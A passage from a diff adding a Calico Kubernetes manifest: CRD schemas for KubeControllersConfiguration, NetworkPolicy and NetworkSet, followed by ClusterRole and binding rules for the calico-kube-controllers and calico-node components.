object + spec: + description: KubeControllersConfigurationSpec contains the values of the + Kubernetes controllers configuration. + properties: + controllers: + description: Controllers enables and configures individual Kubernetes + controllers + properties: + namespace: + description: Namespace enables and configures the namespace controller. + Enabled by default, set to nil to disable. + properties: + reconcilerPeriod: + description: 'ReconcilerPeriod is the period to perform reconciliation + with the Calico datastore. [Default: 5m]' + type: string + type: object + node: + description: Node enables and configures the node controller. + Enabled by default, set to nil to disable. + properties: + hostEndpoint: + description: HostEndpoint controls syncing nodes to host endpoints. + Disabled by default, set to nil to disable. + properties: + autoCreate: + description: 'AutoCreate enables automatic creation of + host endpoints for every node. [Default: Disabled]' + type: string + type: object + leakGracePeriod: + description: 'LeakGracePeriod is the period used by the controller + to determine if an IP address has been leaked. Set to 0 + to disable IP garbage collection. [Default: 15m]' + type: string + reconcilerPeriod: + description: 'ReconcilerPeriod is the period to perform reconciliation + with the Calico datastore. [Default: 5m]' + type: string + syncLabels: + description: 'SyncLabels controls whether to copy Kubernetes + node labels to Calico nodes. [Default: Enabled]' + type: string + type: object + policy: + description: Policy enables and configures the policy controller. + Enabled by default, set to nil to disable. + properties: + reconcilerPeriod: + description: 'ReconcilerPeriod is the period to perform reconciliation + with the Calico datastore. [Default: 5m]' + type: string + type: object + serviceAccount: + description: ServiceAccount enables and configures the service + account controller. Enabled by default, set to nil to disable. + properties: + reconcilerPeriod: + description: 'ReconcilerPeriod is the period to perform reconciliation + with the Calico datastore. [Default: 5m]' + type: string + type: object + workloadEndpoint: + description: WorkloadEndpoint enables and configures the workload + endpoint controller. Enabled by default, set to nil to disable. + properties: + reconcilerPeriod: + description: 'ReconcilerPeriod is the period to perform reconciliation + with the Calico datastore. [Default: 5m]' + type: string + type: object + type: object + etcdV3CompactionPeriod: + description: 'EtcdV3CompactionPeriod is the period between etcdv3 + compaction requests. Set to 0 to disable. [Default: 10m]' + type: string + healthChecks: + description: 'HealthChecks enables or disables support for health + checks [Default: Enabled]' + type: string + logSeverityScreen: + description: 'LogSeverityScreen is the log severity above which logs + are sent to the stdout. [Default: Info]' + type: string + prometheusMetricsPort: + description: 'PrometheusMetricsPort is the TCP port that the Prometheus + metrics server should bind to. Set to 0 to disable. [Default: 9094]' + type: integer + required: + - controllers + type: object + status: + description: KubeControllersConfigurationStatus represents the status + of the configuration. It's useful for admins to be able to see the actual + config that was applied, which can be modified by environment variables + on the kube-controllers process. + properties: + environmentVars: + additionalProperties: + type: string + description: EnvironmentVars contains the environment variables on + the kube-controllers that influenced the RunningConfig. + type: object + runningConfig: + description: RunningConfig contains the effective config that is running + in the kube-controllers pod, after merging the API resource with + any environment variables. + properties: + controllers: + description: Controllers enables and configures individual Kubernetes + controllers + properties: + namespace: + description: Namespace enables and configures the namespace + controller. Enabled by default, set to nil to disable. + properties: + reconcilerPeriod: + description: 'ReconcilerPeriod is the period to perform + reconciliation with the Calico datastore. [Default: + 5m]' + type: string + type: object + node: + description: Node enables and configures the node controller. + Enabled by default, set to nil to disable. + properties: + hostEndpoint: + description: HostEndpoint controls syncing nodes to host + endpoints. Disabled by default, set to nil to disable. + properties: + autoCreate: + description: 'AutoCreate enables automatic creation + of host endpoints for every node. [Default: Disabled]' + type: string + type: object + leakGracePeriod: + description: 'LeakGracePeriod is the period used by the + controller to determine if an IP address has been leaked. + Set to 0 to disable IP garbage collection. [Default: + 15m]' + type: string + reconcilerPeriod: + description: 'ReconcilerPeriod is the period to perform + reconciliation with the Calico datastore. [Default: + 5m]' + type: string + syncLabels: + description: 'SyncLabels controls whether to copy Kubernetes + node labels to Calico nodes. [Default: Enabled]' + type: string + type: object + policy: + description: Policy enables and configures the policy controller. + Enabled by default, set to nil to disable. + properties: + reconcilerPeriod: + description: 'ReconcilerPeriod is the period to perform + reconciliation with the Calico datastore. [Default: + 5m]' + type: string + type: object + serviceAccount: + description: ServiceAccount enables and configures the service + account controller. Enabled by default, set to nil to disable. + properties: + reconcilerPeriod: + description: 'ReconcilerPeriod is the period to perform + reconciliation with the Calico datastore. [Default: + 5m]' + type: string + type: object + workloadEndpoint: + description: WorkloadEndpoint enables and configures the workload + endpoint controller. Enabled by default, set to nil to disable. + properties: + reconcilerPeriod: + description: 'ReconcilerPeriod is the period to perform + reconciliation with the Calico datastore. [Default: + 5m]' + type: string + type: object + type: object + etcdV3CompactionPeriod: + description: 'EtcdV3CompactionPeriod is the period between etcdv3 + compaction requests. Set to 0 to disable. [Default: 10m]' + type: string + healthChecks: + description: 'HealthChecks enables or disables support for health + checks [Default: Enabled]' + type: string + logSeverityScreen: + description: 'LogSeverityScreen is the log severity above which + logs are sent to the stdout. [Default: Info]' + type: string + prometheusMetricsPort: + description: 'PrometheusMetricsPort is the TCP port that the Prometheus + metrics server should bind to. Set to 0 to disable. [Default: + 9094]' + type: integer + required: + - controllers + type: object + type: object + type: object + served: true + storage: true +status: + acceptedNames: + kind: "" + plural: "" + conditions: [] + storedVersions: [] + +--- +apiVersion: apiextensions.k8s.io/v1 +kind: CustomResourceDefinition +metadata: + name: networkpolicies.crd.projectcalico.org +spec: + group: crd.projectcalico.org + names: + kind: NetworkPolicy + listKind: NetworkPolicyList + plural: networkpolicies + singular: networkpolicy + scope: Namespaced + versions: + - name: v1 + schema: + openAPIV3Schema: + properties: + apiVersion: + description: 'APIVersion defines the versioned schema of this representation + of an object. Servers should convert recognized schemas to the latest + internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resources' + type: string + kind: + description: 'Kind is a string value representing the REST resource this + object represents. Servers may infer this from the endpoint the client + submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds' + type: string + metadata: + type: object + spec: + properties: + egress: + description: The ordered set of egress rules. Each rule contains + a set of packet match criteria and a corresponding action to apply. + items: + description: "A Rule encapsulates a set of match criteria and an + action. Both selector-based security Policy and security Profiles + reference rules - separated out as a list of rules for both ingress + and egress packet matching. \n Each positive match criteria has + a negated version, prefixed with \"Not\". All the match criteria + within a rule must be satisfied for a packet to match. A single + rule can contain the positive and negative version of a match + and both must be satisfied for the rule to match." + properties: + action: + type: string + destination: + description: Destination contains the match criteria that apply + to destination entity. + properties: + namespaceSelector: + description: "NamespaceSelector is an optional field that + contains a selector expression. Only traffic that originates + from (or terminates at) endpoints within the selected + namespaces will be matched. When both NamespaceSelector + and another selector are defined on the same rule, then + only workload endpoints that are matched by both selectors + will be selected by the rule. \n For NetworkPolicy, an + empty NamespaceSelector implies that the Selector is limited + to selecting only workload endpoints in the same namespace + as the NetworkPolicy. \n For NetworkPolicy, `global()` + NamespaceSelector implies that the Selector is limited + to selecting only GlobalNetworkSet or HostEndpoint. \n + For GlobalNetworkPolicy, an empty NamespaceSelector implies + the Selector applies to workload endpoints across all + namespaces." + type: string + nets: + description: Nets is an optional field that restricts the + rule to only apply to traffic that originates from (or + terminates at) IP addresses in any of the given subnets. + items: + type: string + type: array + notNets: + description: NotNets is the negated version of the Nets + field. + items: + type: string + type: array + notPorts: + description: NotPorts is the negated version of the Ports + field. Since only some protocols have ports, if any ports + are specified it requires the Protocol match in the Rule + to be set to "TCP" or "UDP". + items: + anyOf: + - type: integer + - type: string + pattern: ^.* + x-kubernetes-int-or-string: true + type: array + notSelector: + description: NotSelector is the negated version of the Selector + field. See Selector field for subtleties with negated + selectors. + type: string + ports: + description: "Ports is an optional field that restricts + the rule to only apply to traffic that has a source (destination) + port that matches one of these ranges/values. This value + is a list of integers or strings that represent ranges + of ports. \n Since only some protocols have ports, if + any ports are specified it requires the Protocol match + in the Rule to be set to \"TCP\" or \"UDP\"." + items: + anyOf: + - type: integer + - type: string + pattern: ^.* + x-kubernetes-int-or-string: true + type: array + selector: + description: "Selector is an optional field that contains + a selector expression (see Policy for sample syntax). + \ Only traffic that originates from (terminates at) endpoints + matching the selector will be matched. \n Note that: in + addition to the negated version of the Selector (see NotSelector + below), the selector expression syntax itself supports + negation. The two types of negation are subtly different. + One negates the set of matched endpoints, the other negates + the whole match: \n \tSelector = \"!has(my_label)\" matches + packets that are from other Calico-controlled \tendpoints + that do not have the label \"my_label\". \n \tNotSelector + = \"has(my_label)\" matches packets that are not from + Calico-controlled \tendpoints that do have the label \"my_label\". + \n The effect is that the latter will accept packets from + non-Calico sources whereas the former is limited to packets + from Calico-controlled endpoints." + type: string + serviceAccounts: + description: ServiceAccounts is an optional field that restricts + the rule to only apply to traffic that originates from + (or terminates at) a pod running as a matching service + account. + properties: + names: + description: Names is an optional field that restricts + the rule to only apply to traffic that originates + from (or terminates at) a pod running as a service + account whose name is in the list. + items: + type: string + type: array + selector: + description: Selector is an optional field that restricts + the rule to only apply to traffic that originates + from (or terminates at) a pod running as a service + account that matches the given label selector. If + both Names and Selector are specified then they are + AND'ed. + type: string + type: object + services: + description: "Services is an optional field that contains + options for matching Kubernetes Services. If specified, + only traffic that originates from or terminates at endpoints + within the selected service(s) will be matched, and only + to/from each endpoint's port. \n Services cannot be specified + on the same rule as Selector, NotSelector, NamespaceSelector, + Nets, NotNets or ServiceAccounts. \n Ports and NotPorts + can only be specified with Services on ingress rules." + properties: + name: + description: Name specifies the name of a Kubernetes + Service to match. + type: string + namespace: + description: Namespace specifies the namespace of the + given Service. If left empty, the rule will match + within this policy's namespace. + type: string + type: object + type: object + http: + description: HTTP contains match criteria that apply to HTTP + requests. + properties: + methods: + description: Methods is an optional field that restricts + the rule to apply only to HTTP requests that use one of + the listed HTTP Methods (e.g. GET, PUT, etc.) Multiple + methods are OR'd together. + items: + type: string + type: array + paths: + description: 'Paths is an optional field that restricts + the rule to apply to HTTP requests that use one of the + listed HTTP Paths. Multiple paths are OR''d together. + e.g: - exact: /foo - prefix: /bar NOTE: Each entry may + ONLY specify either a `exact` or a `prefix` match. The + validator will check for it.' + items: + description: 'HTTPPath specifies an HTTP path to match. + It may be either of the form: exact: : which matches + the path exactly or prefix: : which matches + the path prefix' + properties: + exact: + type: string + prefix: + type: string + type: object + type: array + type: object + icmp: + description: ICMP is an optional field that restricts the rule + to apply to a specific type and code of ICMP traffic. This + should only be specified if the Protocol field is set to "ICMP" + or "ICMPv6". + properties: + code: + description: Match on a specific ICMP code. If specified, + the Type value must also be specified. This is a technical + limitation imposed by the kernel's iptables firewall, + which Calico uses to enforce the rule. + type: integer + type: + description: Match on a specific ICMP type. For example + a value of 8 refers to ICMP Echo Request (i.e. pings). + type: integer + type: object + ipVersion: + description: IPVersion is an optional field that restricts the + rule to only match a specific IP version. + type: integer + metadata: + description: Metadata contains additional information for this + rule + properties: + annotations: + additionalProperties: + type: string + description: Annotations is a set of key value pairs that + give extra information about the rule + type: object + type: object + notICMP: + description: NotICMP is the negated version of the ICMP field. + properties: + code: + description: Match on a specific ICMP code. If specified, + the Type value must also be specified. This is a technical + limitation imposed by the kernel's iptables firewall, + which Calico uses to enforce the rule. + type: integer + type: + description: Match on a specific ICMP type. For example + a value of 8 refers to ICMP Echo Request (i.e. pings). + type: integer + type: object + notProtocol: + anyOf: + - type: integer + - type: string + description: NotProtocol is the negated version of the Protocol + field. + pattern: ^.* + x-kubernetes-int-or-string: true + protocol: + anyOf: + - type: integer + - type: string + description: "Protocol is an optional field that restricts the + rule to only apply to traffic of a specific IP protocol. Required + if any of the EntityRules contain Ports (because ports only + apply to certain protocols). \n Must be one of these string + values: \"TCP\", \"UDP\", \"ICMP\", \"ICMPv6\", \"SCTP\", + \"UDPLite\" or an integer in the range 1-255." + pattern: ^.* + x-kubernetes-int-or-string: true + source: + description: Source contains the match criteria that apply to + source entity. + properties: + namespaceSelector: + description: "NamespaceSelector is an optional field that + contains a selector expression. Only traffic that originates + from (or terminates at) endpoints within the selected + namespaces will be matched. When both NamespaceSelector + and another selector are defined on the same rule, then + only workload endpoints that are matched by both selectors + will be selected by the rule. \n For NetworkPolicy, an + empty NamespaceSelector implies that the Selector is limited + to selecting only workload endpoints in the same namespace + as the NetworkPolicy. \n For NetworkPolicy, `global()` + NamespaceSelector implies that the Selector is limited + to selecting only GlobalNetworkSet or HostEndpoint. \n + For GlobalNetworkPolicy, an empty NamespaceSelector implies + the Selector applies to workload endpoints across all + namespaces." + type: string + nets: + description: Nets is an optional field that restricts the + rule to only apply to traffic that originates from (or + terminates at) IP addresses in any of the given subnets. + items: + type: string + type: array + notNets: + description: NotNets is the negated version of the Nets + field. + items: + type: string + type: array + notPorts: + description: NotPorts is the negated version of the Ports + field. Since only some protocols have ports, if any ports + are specified it requires the Protocol match in the Rule + to be set to "TCP" or "UDP". + items: + anyOf: + - type: integer + - type: string + pattern: ^.* + x-kubernetes-int-or-string: true + type: array + notSelector: + description: NotSelector is the negated version of the Selector + field. See Selector field for subtleties with negated + selectors. + type: string + ports: + description: "Ports is an optional field that restricts + the rule to only apply to traffic that has a source (destination) + port that matches one of these ranges/values. This value + is a list of integers or strings that represent ranges + of ports. \n Since only some protocols have ports, if + any ports are specified it requires the Protocol match + in the Rule to be set to \"TCP\" or \"UDP\"." + items: + anyOf: + - type: integer + - type: string + pattern: ^.* + x-kubernetes-int-or-string: true + type: array + selector: + description: "Selector is an optional field that contains + a selector expression (see Policy for sample syntax). + \ Only traffic that originates from (terminates at) endpoints + matching the selector will be matched. \n Note that: in + addition to the negated version of the Selector (see NotSelector + below), the selector expression syntax itself supports + negation. The two types of negation are subtly different. + One negates the set of matched endpoints, the other negates + the whole match: \n \tSelector = \"!has(my_label)\" matches + packets that are from other Calico-controlled \tendpoints + that do not have the label \"my_label\". \n \tNotSelector + = \"has(my_label)\" matches packets that are not from + Calico-controlled \tendpoints that do have the label \"my_label\". + \n The effect is that the latter will accept packets from + non-Calico sources whereas the former is limited to packets + from Calico-controlled endpoints." + type: string + serviceAccounts: + description: ServiceAccounts is an optional field that restricts + the rule to only apply to traffic that originates from + (or terminates at) a pod running as a matching service + account. + properties: + names: + description: Names is an optional field that restricts + the rule to only apply to traffic that originates + from (or terminates at) a pod running as a service + account whose name is in the list. + items: + type: string + type: array + selector: + description: Selector is an optional field that restricts + the rule to only apply to traffic that originates + from (or terminates at) a pod running as a service + account that matches the given label selector. If + both Names and Selector are specified then they are + AND'ed. + type: string + type: object + services: + description: "Services is an optional field that contains + options for matching Kubernetes Services. If specified, + only traffic that originates from or terminates at endpoints + within the selected service(s) will be matched, and only + to/from each endpoint's port. \n Services cannot be specified + on the same rule as Selector, NotSelector, NamespaceSelector, + Nets, NotNets or ServiceAccounts. \n Ports and NotPorts + can only be specified with Services on ingress rules." + properties: + name: + description: Name specifies the name of a Kubernetes + Service to match. + type: string + namespace: + description: Namespace specifies the namespace of the + given Service. If left empty, the rule will match + within this policy's namespace. + type: string + type: object + type: object + required: + - action + type: object + type: array + ingress: + description: The ordered set of ingress rules. Each rule contains + a set of packet match criteria and a corresponding action to apply. + items: + description: "A Rule encapsulates a set of match criteria and an + action. Both selector-based security Policy and security Profiles + reference rules - separated out as a list of rules for both ingress + and egress packet matching. \n Each positive match criteria has + a negated version, prefixed with \"Not\". All the match criteria + within a rule must be satisfied for a packet to match. A single + rule can contain the positive and negative version of a match + and both must be satisfied for the rule to match." + properties: + action: + type: string + destination: + description: Destination contains the match criteria that apply + to destination entity. + properties: + namespaceSelector: + description: "NamespaceSelector is an optional field that + contains a selector expression. Only traffic that originates + from (or terminates at) endpoints within the selected + namespaces will be matched. When both NamespaceSelector + and another selector are defined on the same rule, then + only workload endpoints that are matched by both selectors + will be selected by the rule. \n For NetworkPolicy, an + empty NamespaceSelector implies that the Selector is limited + to selecting only workload endpoints in the same namespace + as the NetworkPolicy. \n For NetworkPolicy, `global()` + NamespaceSelector implies that the Selector is limited + to selecting only GlobalNetworkSet or HostEndpoint. \n + For GlobalNetworkPolicy, an empty NamespaceSelector implies + the Selector applies to workload endpoints across all + namespaces." + type: string + nets: + description: Nets is an optional field that restricts the + rule to only apply to traffic that originates from (or + terminates at) IP addresses in any of the given subnets. + items: + type: string + type: array + notNets: + description: NotNets is the negated version of the Nets + field. + items: + type: string + type: array + notPorts: + description: NotPorts is the negated version of the Ports + field. Since only some protocols have ports, if any ports + are specified it requires the Protocol match in the Rule + to be set to "TCP" or "UDP". + items: + anyOf: + - type: integer + - type: string + pattern: ^.* + x-kubernetes-int-or-string: true + type: array + notSelector: + description: NotSelector is the negated version of the Selector + field. See Selector field for subtleties with negated + selectors. + type: string + ports: + description: "Ports is an optional field that restricts + the rule to only apply to traffic that has a source (destination) + port that matches one of these ranges/values. This value + is a list of integers or strings that represent ranges + of ports. \n Since only some protocols have ports, if + any ports are specified it requires the Protocol match + in the Rule to be set to \"TCP\" or \"UDP\"." + items: + anyOf: + - type: integer + - type: string + pattern: ^.* + x-kubernetes-int-or-string: true + type: array + selector: + description: "Selector is an optional field that contains + a selector expression (see Policy for sample syntax). + \ Only traffic that originates from (terminates at) endpoints + matching the selector will be matched. \n Note that: in + addition to the negated version of the Selector (see NotSelector + below), the selector expression syntax itself supports + negation. The two types of negation are subtly different. + One negates the set of matched endpoints, the other negates + the whole match: \n \tSelector = \"!has(my_label)\" matches + packets that are from other Calico-controlled \tendpoints + that do not have the label \"my_label\". \n \tNotSelector + = \"has(my_label)\" matches packets that are not from + Calico-controlled \tendpoints that do have the label \"my_label\". + \n The effect is that the latter will accept packets from + non-Calico sources whereas the former is limited to packets + from Calico-controlled endpoints." + type: string + serviceAccounts: + description: ServiceAccounts is an optional field that restricts + the rule to only apply to traffic that originates from + (or terminates at) a pod running as a matching service + account. + properties: + names: + description: Names is an optional field that restricts + the rule to only apply to traffic that originates + from (or terminates at) a pod running as a service + account whose name is in the list. + items: + type: string + type: array + selector: + description: Selector is an optional field that restricts + the rule to only apply to traffic that originates + from (or terminates at) a pod running as a service + account that matches the given label selector. If + both Names and Selector are specified then they are + AND'ed. + type: string + type: object + services: + description: "Services is an optional field that contains + options for matching Kubernetes Services. If specified, + only traffic that originates from or terminates at endpoints + within the selected service(s) will be matched, and only + to/from each endpoint's port. \n Services cannot be specified + on the same rule as Selector, NotSelector, NamespaceSelector, + Nets, NotNets or ServiceAccounts. \n Ports and NotPorts + can only be specified with Services on ingress rules." + properties: + name: + description: Name specifies the name of a Kubernetes + Service to match. + type: string + namespace: + description: Namespace specifies the namespace of the + given Service. If left empty, the rule will match + within this policy's namespace. + type: string + type: object + type: object + http: + description: HTTP contains match criteria that apply to HTTP + requests. + properties: + methods: + description: Methods is an optional field that restricts + the rule to apply only to HTTP requests that use one of + the listed HTTP Methods (e.g. GET, PUT, etc.) Multiple + methods are OR'd together. + items: + type: string + type: array + paths: + description: 'Paths is an optional field that restricts + the rule to apply to HTTP requests that use one of the + listed HTTP Paths. Multiple paths are OR''d together. + e.g: - exact: /foo - prefix: /bar NOTE: Each entry may + ONLY specify either a `exact` or a `prefix` match. The + validator will check for it.' + items: + description: 'HTTPPath specifies an HTTP path to match. + It may be either of the form: exact: : which matches + the path exactly or prefix: : which matches + the path prefix' + properties: + exact: + type: string + prefix: + type: string + type: object + type: array + type: object + icmp: + description: ICMP is an optional field that restricts the rule + to apply to a specific type and code of ICMP traffic. This + should only be specified if the Protocol field is set to "ICMP" + or "ICMPv6". + properties: + code: + description: Match on a specific ICMP code. If specified, + the Type value must also be specified. This is a technical + limitation imposed by the kernel's iptables firewall, + which Calico uses to enforce the rule. + type: integer + type: + description: Match on a specific ICMP type. For example + a value of 8 refers to ICMP Echo Request (i.e. pings). + type: integer + type: object + ipVersion: + description: IPVersion is an optional field that restricts the + rule to only match a specific IP version. + type: integer + metadata: + description: Metadata contains additional information for this + rule + properties: + annotations: + additionalProperties: + type: string + description: Annotations is a set of key value pairs that + give extra information about the rule + type: object + type: object + notICMP: + description: NotICMP is the negated version of the ICMP field. + properties: + code: + description: Match on a specific ICMP code. If specified, + the Type value must also be specified. This is a technical + limitation imposed by the kernel's iptables firewall, + which Calico uses to enforce the rule. + type: integer + type: + description: Match on a specific ICMP type. For example + a value of 8 refers to ICMP Echo Request (i.e. pings). + type: integer + type: object + notProtocol: + anyOf: + - type: integer + - type: string + description: NotProtocol is the negated version of the Protocol + field. + pattern: ^.* + x-kubernetes-int-or-string: true + protocol: + anyOf: + - type: integer + - type: string + description: "Protocol is an optional field that restricts the + rule to only apply to traffic of a specific IP protocol. Required + if any of the EntityRules contain Ports (because ports only + apply to certain protocols). \n Must be one of these string + values: \"TCP\", \"UDP\", \"ICMP\", \"ICMPv6\", \"SCTP\", + \"UDPLite\" or an integer in the range 1-255." + pattern: ^.* + x-kubernetes-int-or-string: true + source: + description: Source contains the match criteria that apply to + source entity. + properties: + namespaceSelector: + description: "NamespaceSelector is an optional field that + contains a selector expression. Only traffic that originates + from (or terminates at) endpoints within the selected + namespaces will be matched. When both NamespaceSelector + and another selector are defined on the same rule, then + only workload endpoints that are matched by both selectors + will be selected by the rule. \n For NetworkPolicy, an + empty NamespaceSelector implies that the Selector is limited + to selecting only workload endpoints in the same namespace + as the NetworkPolicy. \n For NetworkPolicy, `global()` + NamespaceSelector implies that the Selector is limited + to selecting only GlobalNetworkSet or HostEndpoint. \n + For GlobalNetworkPolicy, an empty NamespaceSelector implies + the Selector applies to workload endpoints across all + namespaces." + type: string + nets: + description: Nets is an optional field that restricts the + rule to only apply to traffic that originates from (or + terminates at) IP addresses in any of the given subnets. + items: + type: string + type: array + notNets: + description: NotNets is the negated version of the Nets + field. + items: + type: string + type: array + notPorts: + description: NotPorts is the negated version of the Ports + field. Since only some protocols have ports, if any ports + are specified it requires the Protocol match in the Rule + to be set to "TCP" or "UDP". + items: + anyOf: + - type: integer + - type: string + pattern: ^.* + x-kubernetes-int-or-string: true + type: array + notSelector: + description: NotSelector is the negated version of the Selector + field. See Selector field for subtleties with negated + selectors. + type: string + ports: + description: "Ports is an optional field that restricts + the rule to only apply to traffic that has a source (destination) + port that matches one of these ranges/values. This value + is a list of integers or strings that represent ranges + of ports. \n Since only some protocols have ports, if + any ports are specified it requires the Protocol match + in the Rule to be set to \"TCP\" or \"UDP\"." + items: + anyOf: + - type: integer + - type: string + pattern: ^.* + x-kubernetes-int-or-string: true + type: array + selector: + description: "Selector is an optional field that contains + a selector expression (see Policy for sample syntax). + \ Only traffic that originates from (terminates at) endpoints + matching the selector will be matched. \n Note that: in + addition to the negated version of the Selector (see NotSelector + below), the selector expression syntax itself supports + negation. The two types of negation are subtly different. + One negates the set of matched endpoints, the other negates + the whole match: \n \tSelector = \"!has(my_label)\" matches + packets that are from other Calico-controlled \tendpoints + that do not have the label \"my_label\". \n \tNotSelector + = \"has(my_label)\" matches packets that are not from + Calico-controlled \tendpoints that do have the label \"my_label\". + \n The effect is that the latter will accept packets from + non-Calico sources whereas the former is limited to packets + from Calico-controlled endpoints." + type: string + serviceAccounts: + description: ServiceAccounts is an optional field that restricts + the rule to only apply to traffic that originates from + (or terminates at) a pod running as a matching service + account. + properties: + names: + description: Names is an optional field that restricts + the rule to only apply to traffic that originates + from (or terminates at) a pod running as a service + account whose name is in the list. + items: + type: string + type: array + selector: + description: Selector is an optional field that restricts + the rule to only apply to traffic that originates + from (or terminates at) a pod running as a service + account that matches the given label selector. If + both Names and Selector are specified then they are + AND'ed. + type: string + type: object + services: + description: "Services is an optional field that contains + options for matching Kubernetes Services. If specified, + only traffic that originates from or terminates at endpoints + within the selected service(s) will be matched, and only + to/from each endpoint's port. \n Services cannot be specified + on the same rule as Selector, NotSelector, NamespaceSelector, + Nets, NotNets or ServiceAccounts. \n Ports and NotPorts + can only be specified with Services on ingress rules." + properties: + name: + description: Name specifies the name of a Kubernetes + Service to match. + type: string + namespace: + description: Namespace specifies the namespace of the + given Service. If left empty, the rule will match + within this policy's namespace. + type: string + type: object + type: object + required: + - action + type: object + type: array + order: + description: Order is an optional field that specifies the order in + which the policy is applied. Policies with higher "order" are applied + after those with lower order. If the order is omitted, it may be + considered to be "infinite" - i.e. the policy will be applied last. Policies + with identical order will be applied in alphanumerical order based + on the Policy "Name". + type: number + selector: + description: "The selector is an expression used to pick pick out + the endpoints that the policy should be applied to. \n Selector + expressions follow this syntax: \n \tlabel == \"string_literal\" + \ -> comparison, e.g. my_label == \"foo bar\" \tlabel != \"string_literal\" + \ -> not equal; also matches if label is not present \tlabel in + { \"a\", \"b\", \"c\", ... } -> true if the value of label X is + one of \"a\", \"b\", \"c\" \tlabel not in { \"a\", \"b\", \"c\", + ... } -> true if the value of label X is not one of \"a\", \"b\", + \"c\" \thas(label_name) -> True if that label is present \t! expr + -> negation of expr \texpr && expr -> Short-circuit and \texpr + || expr -> Short-circuit or \t( expr ) -> parens for grouping \tall() + or the empty selector -> matches all endpoints. \n Label names are + allowed to contain alphanumerics, -, _ and /. String literals are + more permissive but they do not support escape characters. \n Examples + (with made-up labels): \n \ttype == \"webserver\" && deployment + == \"prod\" \ttype in {\"frontend\", \"backend\"} \tdeployment != + \"dev\" \t! has(label_name)" + type: string + serviceAccountSelector: + description: ServiceAccountSelector is an optional field for an expression + used to select a pod based on service accounts. + type: string + types: + description: "Types indicates whether this policy applies to ingress, + or to egress, or to both. When not explicitly specified (and so + the value on creation is empty or nil), Calico defaults Types according + to what Ingress and Egress are present in the policy. The default + is: \n - [ PolicyTypeIngress ], if there are no Egress rules (including + the case where there are also no Ingress rules) \n - [ PolicyTypeEgress + ], if there are Egress rules but no Ingress rules \n - [ PolicyTypeIngress, + PolicyTypeEgress ], if there are both Ingress and Egress rules. + \n When the policy is read back again, Types will always be one + of these values, never empty or nil." + items: + description: PolicyType enumerates the possible values of the PolicySpec + Types field. + type: string + type: array + type: object + type: object + served: true + storage: true +status: + acceptedNames: + kind: "" + plural: "" + conditions: [] + storedVersions: [] + +--- +apiVersion: apiextensions.k8s.io/v1 +kind: CustomResourceDefinition +metadata: + name: networksets.crd.projectcalico.org +spec: + group: crd.projectcalico.org + names: + kind: NetworkSet + listKind: NetworkSetList + plural: networksets + singular: networkset + scope: Namespaced + versions: + - name: v1 + schema: + openAPIV3Schema: + description: NetworkSet is the Namespaced-equivalent of the GlobalNetworkSet. + properties: + apiVersion: + description: 'APIVersion defines the versioned schema of this representation + of an object. Servers should convert recognized schemas to the latest + internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resources' + type: string + kind: + description: 'Kind is a string value representing the REST resource this + object represents. Servers may infer this from the endpoint the client + submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds' + type: string + metadata: + type: object + spec: + description: NetworkSetSpec contains the specification for a NetworkSet + resource. + properties: + nets: + description: The list of IP networks that belong to this set. + items: + type: string + type: array + type: object + type: object + served: true + storage: true +status: + acceptedNames: + kind: "" + plural: "" + conditions: [] + storedVersions: [] + +--- +--- +# Source: calico/templates/calico-kube-controllers-rbac.yaml + +# Include a clusterrole for the kube-controllers component, +# and bind it to the calico-kube-controllers serviceaccount. +kind: ClusterRole +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: calico-kube-controllers +rules: + # Nodes are watched to monitor for deletions. + - apiGroups: [""] + resources: + - nodes + verbs: + - watch + - list + - get + # Pods are watched to check for existence as part of IPAM controller. + - apiGroups: [""] + resources: + - pods + verbs: + - get + - list + - watch + # IPAM resources are manipulated when nodes are deleted. + - apiGroups: ["crd.projectcalico.org"] + resources: + - ippools + - ipreservations + verbs: + - list + - apiGroups: ["crd.projectcalico.org"] + resources: + - blockaffinities + - ipamblocks + - ipamhandles + verbs: + - get + - list + - create + - update + - delete + - watch + # kube-controllers manages hostendpoints. + - apiGroups: ["crd.projectcalico.org"] + resources: + - hostendpoints + verbs: + - get + - list + - create + - update + - delete + # Needs access to update clusterinformations. + - apiGroups: ["crd.projectcalico.org"] + resources: + - clusterinformations + verbs: + - get + - create + - update + # KubeControllersConfiguration is where it gets its config + - apiGroups: ["crd.projectcalico.org"] + resources: + - kubecontrollersconfigurations + verbs: + # read its own config + - get + # create a default if none exists + - create + # update status + - update + # watch for changes + - watch +--- +kind: ClusterRoleBinding +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: calico-kube-controllers +roleRef: + apiGroup: rbac.authorization.k8s.io + kind: ClusterRole + name: calico-kube-controllers +subjects: +- kind: ServiceAccount + name: calico-kube-controllers + namespace: kube-system +--- + +--- +# Source: calico/templates/calico-node-rbac.yaml +# Include a clusterrole for the calico-node DaemonSet, +# and bind it to the calico-node serviceaccount. +kind: ClusterRole +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: calico-node +rules: + # The CNI plugin needs to get pods, nodes, and namespaces. + - apiGroups: [""] + resources: + - pods + - nodes + - namespaces + verbs: + - get + # EndpointSlices are used for Service-based network policy rule + # enforcement. + - apiGroups: ["discovery.k8s.io"] + resources: + - endpointslices + verbs: + - watch + - list + - apiGroups: [""] + resources: + - endpoints + - services + verbs: + # Used to discover service IPs for advertisement. + - watch + - list + # Used to discover Typhas. + - get + # Pod CIDR auto-detection on kubeadm needs access to config maps. + - apiGroups: [""] + resources: + - configmaps + verbs: + - get + - apiGroups: [""] + resources: + - nodes/status + verbs: + # Needed for clearing NodeNetworkUnavailable flag. + - patch + # Calico stores some configuration information in node annotations. + - update + # Watch for changes to Kubernetes NetworkPolicies. + - apiGroups: ["networking.k8s.io"] + resources: + - networkpolicies + verbs: + - watch + - list + # Used by Calico for policy information. + - apiGroups: [""] + resources: + - pods + - namespaces + - serviceaccounts + verbs: + - list + - watch + # The CNI plugin patches pods/status. + - apiGroups: [""] + resources: + - pods/status + verbs: + - patch + # Calico monitors various CRDs for config. + - apiGroups: ["crd.projectcalico.org"] + resources: + - globalfelixconfigs + - felixconfigurations + - bgppeers + - globalbgpconfigs + - bgpconfigurations + - ippools + - ipreservations + - ipamblocks + - globalnetworkpolicies + - 